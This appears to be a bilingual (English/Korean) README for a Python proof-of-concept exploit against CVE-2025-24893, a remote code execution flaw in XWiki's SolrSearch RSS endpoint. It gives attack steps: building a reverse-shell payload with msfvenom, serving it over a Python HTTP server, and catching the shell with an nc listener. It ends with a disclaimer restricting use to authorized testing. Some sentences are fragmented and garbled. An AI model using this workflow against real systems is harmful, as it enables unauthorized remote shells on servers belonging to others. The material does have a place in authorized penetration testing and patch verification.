
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
이 파이썬 스크립트는 CVE-2025-24893를 악용합니다. 이 취약점은 XWiki에서 비동기적으로 렌더링되는 Groovy 매크로의 부적절한 샌드박싱으로 인해 발생하는 원격 코드 실행(RCE) 취약점입니다. RSS 기반 SolrSearch 엔드포인트에 인젝션을 통해 임의의 명령 실행을 허용합니다.
msfvenom 사용)스크립트를 클론하거나 다운로드하세요.
다음 항목이 설치되어 있어야 합니다:
msfvenomjq (bash 페이로드에서 사용)스크립트를 실행하세요:
python3 CVE-2025-24893-PoC.py
메뉴에서 선택하세요:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
스크립트는 대상에 다음 시퀀스를 전송합니다:
이 도구는 교육 및 승인된 테스트 목적으로만 사용해야 합니다. 소유하지 않거나 명시적인 테스트 권한이 없는 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.